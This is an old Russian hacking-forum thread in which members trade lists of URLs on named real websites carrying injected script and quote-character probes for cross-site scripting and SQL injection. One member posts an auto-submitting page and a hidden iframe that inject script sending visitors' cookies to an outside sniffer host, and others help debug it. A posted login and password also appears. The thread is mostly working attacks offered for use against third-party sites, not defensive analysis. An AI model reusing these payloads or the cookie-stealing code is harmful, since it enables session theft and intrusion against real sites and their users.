Бажные сайты от k1b0rg'a

Discussion in 'Уязвимости' started by k1b0rg, 13 Nov 2005.

Thread Status:
Not open for further replies.
  1. k1b0rg

    k1b0rg Тут может быть ваша реклама.

    Joined:
    30 Jul 2005
    Messages:
    1,182
    Likes Received:
    399
    Reputations:
    479
    пока нашол раскрытие пути, щас еще поищу
    Warning: Cannot modify header information - headers already sent by (output started at /var/www/hackthissite.org/html/includes/layout/header.php:12) in /var/www/hackthissite.org/html/pages/articles/read_article.php on line 21
    You are not logged in! Redirection to: http://www.illgotten.net/view/390.phpIf you wish to view this article with added HTS functionality, please register/login in
     
    1 person likes this.
  2. Бафун

    Бафун Banned

    Joined:
    19 Nov 2005
    Messages:
    16
    Likes Received:
    2
    Reputations:
    -1
    Это не бага, это ошибка которая говорит, что ты не зареган не залогинен.

    Найдешь мне багу на этом сайте, буду у тебя в долгу. Это касается всех. Кто найдет багу на этом сайте, у того Белый Джордан будет официально в долгу. :rolleyes:



    Логин и пассворд для желающих. :rolleyes:


    zaq123qwerty:12345
     
    #42 Бафун, 22 Nov 2005
    Last edited: 22 Nov 2005
  3. k1b0rg

    k1b0rg Тут может быть ваша реклама.

    Joined:
    30 Jul 2005
    Messages:
    1,182
    Likes Received:
    399
    Reputations:
    479
    http://megafon.buongiorno.com/megafon/web/russian/index.html где просят номер телефона (+7....)Можно вводить любой код
    http://www.tefal.ru/tefal/magazine/recipe_results.asp?keyword=">%3Cscript%3Ealert%28%29%3C%2Fscript%3E&selectName=&APPLIANCE=&SPECIAL_DIETS=&x=0&y=0
    http://lafox.net/shop/?gid=73'"><script>alert()</script>
    http://www.hacktivist.net/anarchy/index.php?action=search'
    http://www.sexonly.ru/katalog.php?ganr=20'
    http://www.icq.com/icqchat/browse_folder.php?tid=30279";//--></script><script>alert()</script>
    http://www.download.com/3120-20_4-0.html?tag=srch&nid=1&qt=666&tg=dl-2001"><script>alert()</script>
    http://www.osmarket.ru/products/5'
    http://zubov.net/666"%20style=background:url(javascript:alert());".cfm?nft=1&t=5&p=1
    http://drocher.ru/goods_list.php?rubric_id=14"><script>alert()</script>
     
  4. max_pain89

    max_pain89 Eat `em UP!

    Joined:
    11 Dec 2004
    Messages:
    451
    Likes Received:
    140
    Reputations:
    146
    http://hosting.mail.ru/WhoisService.jsp?domain=<img%20style="background:url(vbscript:confirm())"> IE
     
  5. Tem

    Tem -

    Joined:
    5 Oct 2005
    Messages:
    557
    Likes Received:
    157
    Reputations:
    179
    -------------------------------------------------------------------
    Вот прочитал статью и сделал всё как тама :

    HTML:
    <html>
    <body onload="document.forms['snif'].submit()">
    <form name="snif" action="http://www.mix.az/engine/modules/imagepreview.php?image=');">
    <input type="text" name="word" value="<script>img = new Image(); 
    
    img.src='http://antichat.ru/cgi-bin/s.jpg'+document.cookie;</script>">
    </form>
    ---------------------------------------------------------------------
    Сохранил всё на ХТМЛ, и поместил у себя на сайте,открыл эту страничку , алерт не кидает, и на лог снифера нечего не идёт , почему , что я так не делаю под правь меня?
     
  6. k1b0rg

    k1b0rg Тут может быть ваша реклама.

    Joined:
    30 Jul 2005
    Messages:
    1,182
    Likes Received:
    399
    Reputations:
    479
    http://www.npj.ru/in/dura-lex-group/by/pvp/42564"%20style=background:url(javascript:alert());"

    http://www.uinc.ru/news/sendnews.php
    тема:" style=background:url(javascript:alert(1));"
    Сообщение:</textarea><script>alert(2)</script>
    Ваше имя:" style=background:url(javascript:alert(3));"
    Ваш E-mail:" style=background:url(javascript:alert(4));"
    Введите код, указанный на картинке: НЕ ввожим, жмем отправить получаем alert
    может быть это и активная xss, хз я не проверял.

    p.s. Tem
    в скрытом фрейме можешь просто написать
    <script>img = new Image(); img.src="http://antichat.ru/cgi-bin/s.jpg"+document.cookie;</script>
    а не видно, наверное потому он и скрытый
     
  7. Tem

    Tem -

    Joined:
    5 Oct 2005
    Messages:
    557
    Likes Received:
    157
    Reputations:
    179
    Так или я рехнулся, или уже спать хочется, и я перестал сооброжать, а где этот скрытый фрейм. ((

    Или мне проста надо создать фрейм ?
     
    #47 Tem, 22 Nov 2005
    Last edited: 22 Nov 2005
  8. GreenBear

    GreenBear наркоман с медалью

    Joined:
    7 May 2005
    Messages:
    2,547
    Likes Received:
    1,398
    Reputations:
    612
    Замени весь файл на
    <iframe widht=0 height=0 frameborder=0 src=http:/// ></iframe>
    да и все дела
     
  9. Tem

    Tem -

    Joined:
    5 Oct 2005
    Messages:
    557
    Likes Received:
    157
    Reputations:
    179
  10. k1b0rg

    k1b0rg Тут может быть ваша реклама.

    Joined:
    30 Jul 2005
    Messages:
    1,182
    Likes Received:
    399
    Reputations:
    479
    <AD- me замени на <iframe
    <AD- ame>замени на </iframe>
    почитай про фреймы.Возьми какой нить учебник и прочти, там немного читать, зато сразу разберешься что к чему
     
  11. dim_ok

    dim_ok Elder - Старейшина

    Joined:
    26 Mar 2005
    Messages:
    173
    Likes Received:
    64
    Reputations:
    47
    хха -) отключи свою банерорезку -) у меня из-за Outpost'а такая же хрень.
     
  12. Tem

    Tem -

    Joined:
    5 Oct 2005
    Messages:
    557
    Likes Received:
    157
    Reputations:
    179
    Я про фреймы читал и знаю, но как эксплотировать нет, и у меня сейчас на часах 2 ночи, както не охота читать, вот мой код.
    HTML:
    <html>
    <iframe widht=0 height=0 frameborder=0 src=http://www.mix.az/engine/modules/imagepreview.php?image=');</script><script>img = new Image(); img.src="http://antichat.ru/cgi-bin/s.jpg"+document.cookie;</script>
    </iframe>
    </html>
    Замени его по своему если не трудно, ото я три дня над этим сижу.
     
  13. k1b0rg

    k1b0rg Тут может быть ваша реклама.

    Joined:
    30 Jul 2005
    Messages:
    1,182
    Likes Received:
    399
    Reputations:
    479
    http://antichat.ru/cgi-bin/s.jpg?
    вопрос должен в конце стоять.а так вроде все прально.
    у тебя должно три страницы
    1-главная(в ней тока коды размещения фреймов)
    2-Тело, то что будет видеть чел когда зайдет на твой сайт.
    3-скрытый фрейм(тот что ты написал вверху)
    если у тебя ничо не получиться, я те завтра отпишу готовый пример.
    блин точна, я и забыл что велел ему все блокировать, апплеты, флеш, скрытые фреймы, и т.д.
     
    #53 k1b0rg, 22 Nov 2005
    Last edited: 22 Nov 2005
  14. porter

    porter Banned

    Joined:
    1 Mar 2005
    Messages:
    58
    Likes Received:
    9
    Reputations:
    1
    k1b0rg попробуй найти xcc на www.wwc.ru
     
  15. k1b0rg

    k1b0rg Тут может быть ваша реклама.

    Joined:
    30 Jul 2005
    Messages:
    1,182
    Likes Received:
    399
    Reputations:
    479
    http://www.footbolka.ru/catalog/index.php?ref=xren'
    http://www.whoistar.com/content/view/55/1'/
    http://narod.yandex.ru/userforum/message.xhtml?owner=[название_форума_жертвы]&message_id=3042605&thread_id=0&nickname=&email=&vari=2<script>alert()</script>
    http://www.allpravo.ru/?id=88&type=0&query='"
    http://www.classis.ru/cgi-bin/links...view=%C4%EE%E1%E0%E2%E8%F2%FC+%EE%F2%E7%FB%E2
    http://www.refer.ru/menu?a=select_add&id="><script>alert()</script>
    http://test.msk.ru/cgi-bin/searchdiplom2.cgi?words=<script>alert()</script>

    2porter http://wwc.ru/index.php?do=search&ss="><script>alert()</script>
     
  16. max_pain89

    max_pain89 Eat `em UP!

    Joined:
    11 Dec 2004
    Messages:
    451
    Likes Received:
    140
    Reputations:
    146
  17. k1b0rg

    k1b0rg Тут может быть ваша реклама.

    Joined:
    30 Jul 2005
    Messages:
    1,182
    Likes Received:
    399
    Reputations:
    479
    http://www.mtve.com/index.php?Page=2"><script>alert()</script>
    http://register.logitech.com/index.cfm?validate=1";</script><script>alert()</script>
    http://www.w3.org/Search/Mail/Publi...type=t&type-index="><script>alert(2)</script>
    http://serial.com/?show=<script>alert()</script>&submit=Search
    http://www.phpbuilder.com/snippet/browse.php?by=cat&cat=1"style=background:url(javascript:alert());"
    http://poisk.ru/#"><script>alert()</script>
    http://an.aport.ru/scripts/template.dll?That=ref&r="><script>alert()</script>&Base=referat&Rt=2
    http://www.sexvideogid.ru/search.php?q="><script>alert()</script>
    http://www.ag.ru/cheats/baldurs_gate_2_throne_of_bhaal/15170"><script>alert()</script>
    http://catalog.aport.ru/rus/themes.aspx?id=1778'"><xz>
    http://multifon.ru/stm/stm_popup.php?pid=54&type=jpg&name=666&url="style=background:url(javascript:alert());"
    http://www.chestertonholdings.com/inquiry_handler.php отсутствует проверка полей
    http://www.iceberg.ru/services/?id=23'&parent=0
     
  18. 4NT_0_xa

    4NT_0_xa New Member

    Joined:
    24 Nov 2005
    Messages:
    3
    Likes Received:
    0
    Reputations:
    0
    http://www.scriptsearch.com/cgi-bin/report.cgi?999=delete&ID=%3Cscript%3Ealert('XSS')%3C/script%3E
     
  19. k1b0rg

    k1b0rg Тут может быть ваша реклама.

    Joined:
    30 Jul 2005
    Messages:
    1,182
    Likes Received:
    399
    Reputations:
    479
    http://1ps.ru/pr/ отсутствует проверка полей
    http://seminar.spylog.ru/?rp=seminars/descr/15/ отсутствует проверка полей
    http://members.yadro.ru/banners/nowstate.php3?vbn_id=-1'
    http://hw.ru/hi-tech/Login.jsp?login='"><script>alert(1)</script>&password='"><script>alert(2)</script>
    http://www.srb.ru/search-results/?q="><script>alert()</script>&m=all&wm=wrd&ps=10&page=0
    http://www.profits.ru/login.php?w=user&o=login&e=u'
    http://www.gf.ru/cgi-bin/podftp.cgi?hostname=<script>alert()</script>
    http://www.zerkalo.com/cgi-bin/mail/adduser.cgi вводим в дополнительно->наши новости:Разные словосочетания допустим '"><script>!! в поля email и имя, и получаем на выходе http://www.zerkalo.com/cgi-bin/mail/adduser.cgi со строкой/home/ztu22/dead.letter... Saved message in /home/ztu22/dead.letter
    http://smchat.ru/?s=reguser&login="><script>alert()</script>
    http://www.film.ru/search.asp?what=...(javascript:alert());"&where=root&mode=medium
     
  20. 4NT_0_xa

    4NT_0_xa New Member

    Joined:
    24 Nov 2005
    Messages:
    3
    Likes Received:
    0
    Reputations:
    0
    http://forum.utro.ru/newuser.php?Cat=<script>alert('xss')</script>
    жмём "далее" - три xss
     
    #60 4NT_0_xa, 26 Nov 2005
    Last edited: 26 Nov 2005
Thread Status:
Not open for further replies.